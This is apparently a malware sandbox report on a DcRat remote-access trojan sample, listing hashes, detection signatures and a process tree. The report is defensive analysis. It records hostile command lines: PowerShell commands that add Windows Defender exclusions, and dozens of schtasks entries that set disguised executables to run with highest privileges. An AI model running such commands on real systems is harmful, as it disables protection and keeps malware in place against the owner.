Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/12/2024, 21:16 UTC

General

  • Target

    JaffaCakes118_eb7aeab45fa38000ca3f056c4ab4f9591da273abcd7902961c69caab690e951a.exe

  • Size

    1.3MB

  • MD5

    1ad2438558c7e3cd8d056fc3e82fa5d9

  • SHA1

    648af128b0c42514f6d8c3fefd26b40f709ce6ab

  • SHA256

    eb7aeab45fa38000ca3f056c4ab4f9591da273abcd7902961c69caab690e951a

  • SHA512

    0afb9ee48dcd38e5e88bea63ba4f82b55b323c9dd8ee65c9905b3f00765fdc7d08f4b64fee3e327a16de0b992226fda48a59821ab3ef22342c4efea82f40ef83

  • SSDEEP

    24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 57 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 2 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 15 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 14 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 13 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 57 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_eb7aeab45fa38000ca3f056c4ab4f9591da273abcd7902961c69caab690e951a.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_eb7aeab45fa38000ca3f056c4ab4f9591da273abcd7902961c69caab690e951a.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4544
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1716
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2432
        • C:\providercommon\DllCommonsvc.exe
          "C:\providercommon\DllCommonsvc.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1440
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4604
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\System.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1460
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\SppExtComObj.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1900
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\fontdrvhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:376
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\fr-FR\Registry.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:448
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\SearchApp.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:372
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Crashpad\TextInputHost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1012
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\smss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1532
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\fontdrvhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4788
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1544
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Registry.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:540
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\winlogon.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4508
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\es-ES\smss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2288
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\sihost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:772
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\de-DE\SppExtComObj.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2592
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\SearchApp.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2184
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\RuntimeBroker.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4804
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\unsecapp.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1292
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Registry.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:812
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\debug\dllhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1988
          • C:\Recovery\WindowsRE\conhost.exe
            "C:\Recovery\WindowsRE\conhost.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4896
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ww6iFNwlpp.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2980
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                  PID:5196
                • C:\Recovery\WindowsRE\conhost.exe
                  "C:\Recovery\WindowsRE\conhost.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:5360
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lZfwAG7KGX.bat"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2916
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      9⤵
                        PID:5612
                      • C:\Recovery\WindowsRE\conhost.exe
                        "C:\Recovery\WindowsRE\conhost.exe"
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:5888
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ys8lvSze9b.bat"
                          10⤵
                            PID:2320
                            • C:\Windows\system32\w32tm.exe
                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              11⤵
                                PID:3324
                              • C:\Recovery\WindowsRE\conhost.exe
                                "C:\Recovery\WindowsRE\conhost.exe"
                                11⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Modifies registry class
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1720
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bf2k7CZMYL.bat"
                                  12⤵
                                    PID:696
                                    • C:\Windows\system32\w32tm.exe
                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      13⤵
                                        PID:372
                                      • C:\Recovery\WindowsRE\conhost.exe
                                        "C:\Recovery\WindowsRE\conhost.exe"
                                        13⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Modifies registry class
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5772
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SvvYNrLnHE.bat"
                                          14⤵
                                            PID:3232
                                            • C:\Windows\system32\w32tm.exe
                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                              15⤵
                                                PID:5788
                                              • C:\Recovery\WindowsRE\conhost.exe
                                                "C:\Recovery\WindowsRE\conhost.exe"
                                                15⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Modifies registry class
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2020
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iYTmIkWLiw.bat"
                                                  16⤵
                                                    PID:5964
                                                    • C:\Windows\system32\w32tm.exe
                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                      17⤵
                                                        PID:5540
                                                      • C:\Recovery\WindowsRE\conhost.exe
                                                        "C:\Recovery\WindowsRE\conhost.exe"
                                                        17⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Modifies registry class
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5740
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\N4rS0hE0df.bat"
                                                          18⤵
                                                            PID:3296
                                                            • C:\Windows\system32\w32tm.exe
                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                              19⤵
                                                                PID:3152
                                                              • C:\Recovery\WindowsRE\conhost.exe
                                                                "C:\Recovery\WindowsRE\conhost.exe"
                                                                19⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Modifies registry class
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4408
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bf2k7CZMYL.bat"
                                                                  20⤵
                                                                    PID:1836
                                                                    • C:\Windows\system32\w32tm.exe
                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                      21⤵
                                                                        PID:2980
                                                                      • C:\Recovery\WindowsRE\conhost.exe
                                                                        "C:\Recovery\WindowsRE\conhost.exe"
                                                                        21⤵
                                                                        • Checks computer location settings
                                                                        • Executes dropped EXE
                                                                        • Modifies registry class
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4828
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat"
                                                                          22⤵
                                                                            PID:3276
                                                                            • C:\Windows\system32\w32tm.exe
                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                              23⤵
                                                                                PID:5608
                                                                              • C:\Recovery\WindowsRE\conhost.exe
                                                                                "C:\Recovery\WindowsRE\conhost.exe"
                                                                                23⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Modifies registry class
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5356
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lZfwAG7KGX.bat"
                                                                                  24⤵
                                                                                    PID:528
                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                      25⤵
                                                                                        PID:2916
                                                                                      • C:\Recovery\WindowsRE\conhost.exe
                                                                                        "C:\Recovery\WindowsRE\conhost.exe"
                                                                                        25⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5472
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\J6RTVEKunr.bat"
                                                                                          26⤵
                                                                                            PID:960
                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                              27⤵
                                                                                                PID:4472
                                                                                              • C:\Recovery\WindowsRE\conhost.exe
                                                                                                "C:\Recovery\WindowsRE\conhost.exe"
                                                                                                27⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Modifies registry class
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3876
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Xnyek1SZun.bat"
                                                                                                  28⤵
                                                                                                    PID:5704
                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                      29⤵
                                                                                                        PID:5436
                                                                                                      • C:\Recovery\WindowsRE\conhost.exe
                                                                                                        "C:\Recovery\WindowsRE\conhost.exe"
                                                                                                        29⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4988
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\providercommon\System.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1492
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2012
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2920
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\providercommon\SppExtComObj.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:5104
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\providercommon\SppExtComObj.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2684
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\providercommon\SppExtComObj.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2940
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\fontdrvhost.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2412
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\fontdrvhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1444
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Program Files\Uninstall Information\fontdrvhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1000
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Internet Explorer\fr-FR\Registry.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4624
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\fr-FR\Registry.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3296
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Program Files\Internet Explorer\fr-FR\Registry.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3932
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\SearchApp.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4848
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\SearchApp.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:904
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\SearchApp.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:5008
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Program Files\Crashpad\TextInputHost.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1936
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files\Crashpad\TextInputHost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1108
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 7 /tr "'C:\Program Files\Crashpad\TextInputHost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:696
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\smss.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2712
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\smss.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4768
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\smss.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2724
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Saved Games\fontdrvhost.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4076
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\fontdrvhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1036
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Saved Games\fontdrvhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1864
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4824
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3116
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1792
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\Registry.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1192
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2784
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2388
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\providercommon\winlogon.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4684
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\providercommon\winlogon.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4020
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\providercommon\winlogon.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1040
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\smss.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4064
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\smss.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3760
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\smss.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4028
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\sihost.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:944
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\sihost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2744
                                              • C:\Windows\system32\schtasks.exe
